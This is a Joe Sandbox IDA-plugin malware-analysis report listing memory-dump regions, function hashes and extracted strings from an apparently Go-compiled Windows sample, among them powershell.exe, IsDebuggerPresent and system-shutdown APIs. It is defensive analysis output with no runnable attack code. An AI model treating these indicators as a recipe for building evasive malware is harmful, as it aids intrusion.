Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETE$) is larger than maximum page size () is not Grunnable or Gscanrunnable0123456789abcdefghijklmnopqrstuvwxyz444089209850062616169452667236328125Go pointer stored into non-Go memoryUnable to determine system directoryaccessed data from freed user arena accessin$) is smaller than minimum page size (2220446049250313080847263336181640625UnsubscribeServiceChangeNotifications_cgo_notify_runtime_init_done missingall goroutines are asleep - deadlock!cannot exec a shared library directlyfailed to reserve page summary memoryi$) must be a power of 223283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvironmentStringsWGetActi$bad TinySizeClassentersyscallblockexec format errorexec: killing Cmdexec: not startedg already scannedgp.waiting != nillocked m0 woke upmark - bad statusmarkBits overflownil resource bodyno data availablenotetsleepg on g0permission deniedreflect.Value.Intrefle$bad system huge page sizechansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing traceGCSweepStartno answer from DNS serverno buffer $bad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection timed outdodeltimer0: wrong Pfloating point errorforcegc: phase errorgo of nil func valuegopark: bad g statusinconsistent lockedminvalid DNS response$failed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid network interface nameinvalid pointer found on stacknotetsleep - waitm out of syncprotocol wrong type for socketreflect: Elem of invalid type reflect: Len of non-$system huge page size (too many pointers (>10)work.nwait > work.nproc116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorWCape Verde Standard Tim$system page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard Ti
API String ID: 0-1195454320
Opcode ID: ccc748cedf4e8bc0d66cc463f3886c9952251ddd712c6edfff40ecd90722cda0
Instruction ID: 96ccf95e6eccedb405c89de722e806589a14b526735c61cabed768b326254b01
Opcode Fuzzy Hash: ccc748cedf4e8bc0d66cc463f3886c9952251ddd712c6edfff40ecd90722cda0
Instruction Fuzzy Hash: EE612B35325A44DAEF14BB10E9823AD77B8FB09780F945562DA0D4B362EF3DC984E321

Function 00A67EC0 Relevance: 11.4, Strings: 9, Instructions: 167COMMON

Download Yara Rule

Strings

, not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11Wa, xrefs: 00A67FFD
interface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not nilprotocol not availableprotocol not supportedremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack:, xrefs: 00A67F9D, 00A68154, 00A68239
interfaceinterruptinvalid nipv6-icmpmSpanDeadntdll.dllole32.dllpanicwaitpclmulqdqpreemptedprofBlockpsapi.dllrecover: reflect: rwxrwxrwxscavtracestackpooltracebackwbufSpanswinmm.dll} stack=[ MB goal, flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= , xrefs: 00A67EFB
is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status %!Month(-command48828125AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDecemberDuployanEqualSidEthiopicExtenderFebruaryFullPathGeor, xrefs: 00A6817F
: missing method AdjustTokenGroupsCertFindExtensionCryptDecodeObjectDnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetKeyboardLayoutGetShortPathNameWIsDebuggerPresentIsTokenRestrictedLookupAccountSidWOld_N, xrefs: 00A681B7
(types from different scopes) in prepareForSweep; sweepgen locals stack map entries for 227373675443232059478759765625Central European Standard TimeCentral Standard Time (Mexico)CertDeleteCertificateFromStoreE. South America Standard TimeEastern Standard Tim, xrefs: 00A68114
is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsExFindFirstFileFindNextFileW, xrefs: 00A68224
is lr: of on pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftps, xrefs: 00A67FD2
(types from different packages)28421709430404007434844970703125CertAddCertificateContextToStoreCertVerifyCertificateChainPolicyGetVolumePathNamesForVolumeNameWMapIter.Value called before NextWSAGetOverlappedResult not found" not supported for cpu option "end , xrefs: 00A680F5

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (types from different packages)28421709430404007434844970703125CertAddCertificateContextToStoreCertVerifyCertificateChainPolicyGetVolumePathNamesForVolumeNameWMapIter.Value called before NextWSAGetOverlappedResult not found" not supported for cpu option "end $ (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for 227373675443232059478759765625Central European Standard TimeCentral Standard Time (Mexico)CertDeleteCertificateFromStoreE. South America Standard TimeEastern Standard Tim$ is lr: of on pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftps$ is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsExFindFirstFileFindNextFileW$ is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status %!Month(-command48828125AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDecemberDuployanEqualSidEthiopicExtenderFebruaryFullPathGeor$, not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11Wa$: missing method AdjustTokenGroupsCertFindExtensionCryptDecodeObjectDnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetKeyboardLayoutGetShortPathNameWIsDebuggerPresentIsTokenRestrictedLookupAccountSidWOld_N$interface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not nilprotocol not availableprotocol not supportedremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack:$interfaceinterruptinvalid nipv6-icmpmSpanDeadntdll.dllole32.dllpanicwaitpclmulqdqpreemptedprofBlockpsapi.dllrecover: reflect: rwxrwxrwxscavtracestackpooltracebackwbufSpanswinmm.dll} stack=[ MB goal, flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize=
API String ID: 0-3047661386
Opcode ID: 0bcc86b1a872e66d9cfe76d1d6d1457fd44cf53aeb980158cedb748596fa6fd0
Instruction ID: 562ef5960d8020bab76fdbae723ffef1e87f72c3062d2509a79f0953d56a01e1
Opcode Fuzzy Hash: 0bcc86b1a872e66d9cfe76d1d6d1457fd44cf53aeb980158cedb748596fa6fd0
Instruction Fuzzy Hash: F691DD72208BC585DB60DB15F8803DAB3A5F389B84F548526DBCC97B29EF78C499CB00

Function 00AAF960 Relevance: 10.3, Strings: 8, Instructions: 311COMMON

Download Yara Rule

Strings

runtime: no module data for save on system g not allowed45474735088646411895751953125CM_Get_Device_Interface_ListWCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListGetSystemPreferredUILanguagesG, xrefs: 00AAFAAF
invalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attachedregion exceeds uintptr rangeruntime., xrefs: 00AAFE9B
tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedeferfalsefaultfilesgcinggscanhchanhttpsimap2, xrefs: 00AAFCF2
no module datano such devicepowershell.exeprotocol errorruntime: full=runtime: want=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunreachable: unsafe.P, xrefs: 00AAFAD9
value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsignal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status %!Month(, xrefs: 00AAFDE8
pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidle, xrefs: 00AAFCB0
runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaF, xrefs: 00AAFC8D
targetpc= throwing= until pc=%!Weekday(, bound = , limit = /dev/stdin12207031256103515625AdditionalBad varintCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDeprecatedDevanagariDnsQuery_WException GC forcedGOMAXPROCSGOMEMLIMITGetIfEntryGetVersion, xrefs: 00AAFCCF

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsignal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status %!Month($ pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidle$ tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedeferfalsefaultfilesgcinggscanhchanhttpsimap2$ targetpc= throwing= until pc=%!Weekday(, bound = , limit = /dev/stdin12207031256103515625AdditionalBad varintCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDeprecatedDevanagariDnsQuery_WException GC forcedGOMAXPROCSGOMEMLIMITGetIfEntryGetVersion$invalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attachedregion exceeds uintptr rangeruntime.$no module datano such devicepowershell.exeprotocol errorruntime: full=runtime: want=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunreachable: unsafe.P$runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaF$runtime: no module data for save on system g not allowed45474735088646411895751953125CM_Get_Device_Interface_ListWCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListGetSystemPreferredUILanguagesG
API String ID: 0-3032801937
Opcode ID: 7fb957f8808ba50e63e8dd86ef6bdc173500bacf051e15097afea78ee69f654b
Instruction ID: 895436d9e30a27714406803fe847736ce18a33e2e67e23be04d0f083d4caf23f
Opcode Fuzzy Hash: 7fb957f8808ba50e63e8dd86ef6bdc173500bacf051e15097afea78ee69f654b
Instruction Fuzzy Hash: 96D14A32719BC08ADA64DF65F98035EB7A5F789B80F548126EB8D43B69CF38C855CB40

Function 00A610E0 Relevance: 10.3, Strings: 8, Instructions: 306COMMON

Download Yara Rule

Strings

GODEBUG: value "GetComputerNameWGetCurrentThreadGetDesktopWindowGetFullPathNameWGetGUIThreadInfoGetLogicalDrivesGetLongPathNameWGetNamedPipeInfoGetPriorityClassImperial_AramaicMeroitic_CursiveNetApiBufferFreeOpenProcessTokenOther_AlphabeticRCodeFormatErrorRegQ, xrefs: 00A61291
" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMayMroNDTNSTNULNaNNkoPC=PDTPKTPSTStdU, xrefs: 00A612D4, 00A61328, 00A61555
" not supported for cpu option "end outside usable address spaceinvalid limiter event type foundnumerical argument out of domainpanic while printing panic valuereflect.nameFrom: tag too long: removespecial on invalid pointerresource temporarily unavailablerunt, xrefs: 00A612B4
cpu., xrefs: 00A61173
", missing CPU supportbytes.Buffer: too largechan receive (nil chan)close of closed channeldevice or resource busyfatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left ov, xrefs: 00A613CC
GODEBUG: unknown cpu feature "GetProcessPreferredUILanguagesGetSecurityDescriptorRMControlGetSystemTimePreciseAsFileTimeMapIter.Key called before NextPacific Standard Time (Mexico)QueryServiceDynamicInformationSetSecurityDescriptorRMControlSetupDiCreateDeviceI, xrefs: 00A61535
GODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusGetSecurityDescriptorDaclGetSecurityDescriptorSaclGetSidIdentifierAuthorityInitiateSystemShutdownExWIsValidSecurityDescriptorKaliningrad Standard TimeMiddle East Standard TimeNew Zealan, xrefs: 00A613AC
GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWbase outside usable address spaceconcurrent map read and map writefindrunnable: negative nmspin, xrefs: 00A61308

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: " ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMayMroNDTNSTNULNaNNkoPC=PDTPKTPSTStdU$" not supported for cpu option "end outside usable address spaceinvalid limiter event type foundnumerical argument out of domainpanic while printing panic valuereflect.nameFrom: tag too long: removespecial on invalid pointerresource temporarily unavailablerunt$", missing CPU supportbytes.Buffer: too largechan receive (nil chan)close of closed channeldevice or resource busyfatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left ov$GODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusGetSecurityDescriptorDaclGetSecurityDescriptorSaclGetSidIdentifierAuthorityInitiateSystemShutdownExWIsValidSecurityDescriptorKaliningrad Standard TimeMiddle East Standard TimeNew Zealan$GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWbase outside usable address spaceconcurrent map read and map writefindrunnable: negative nmspin$GODEBUG: unknown cpu feature "GetProcessPreferredUILanguagesGetSecurityDescriptorRMControlGetSystemTimePreciseAsFileTimeMapIter.Key called before NextPacific Standard Time (Mexico)QueryServiceDynamicInformationSetSecurityDescriptorRMControlSetupDiCreateDeviceI$GODEBUG: value "GetComputerNameWGetCurrentThreadGetDesktopWindowGetFullPathNameWGetGUIThreadInfoGetLogicalDrivesGetLongPathNameWGetNamedPipeInfoGetPriorityClassImperial_AramaicMeroitic_CursiveNetApiBufferFreeOpenProcessTokenOther_AlphabeticRCodeFormatErrorRegQ$cpu.
API String ID: 0-1035228570
Opcode ID: e7f276d7adcb6441880ac544f2865361c55520c44e7bf929b7658fc0d7279d30
Instruction ID: ea30af348fc4430bc0ec4b0b0684fdea907ee5cd7b1b68fc6345472cdd9ea4f6
Opcode Fuzzy Hash: e7f276d7adcb6441880ac544f2865361c55520c44e7bf929b7658fc0d7279d30
Instruction Fuzzy Hash: B5C1AD76709B80C1DA00DB62E5413AEBBB1F78ABD0F484626EF8A47B65DF78C8508750

Function 00A7EE80 Relevance: 10.2, Strings: 8, Instructions: 215COMMON

Download Yara Rule

Strings

B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneifor, xrefs: 00A7F11F
exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateF, xrefs: 00A7F04F
B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKh, xrefs: 00A7F176
pacer: panic: runningsignal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status %!Month(-command48828125AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClas, xrefs: 00A7F005
+/1;<=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/??, xrefs: 00A7F0BD, 00A7F0D8
% CPU (, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaS, xrefs: 00A7F032
B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriti, xrefs: 00A7F0F3
B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons, xrefs: 00A7F191

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
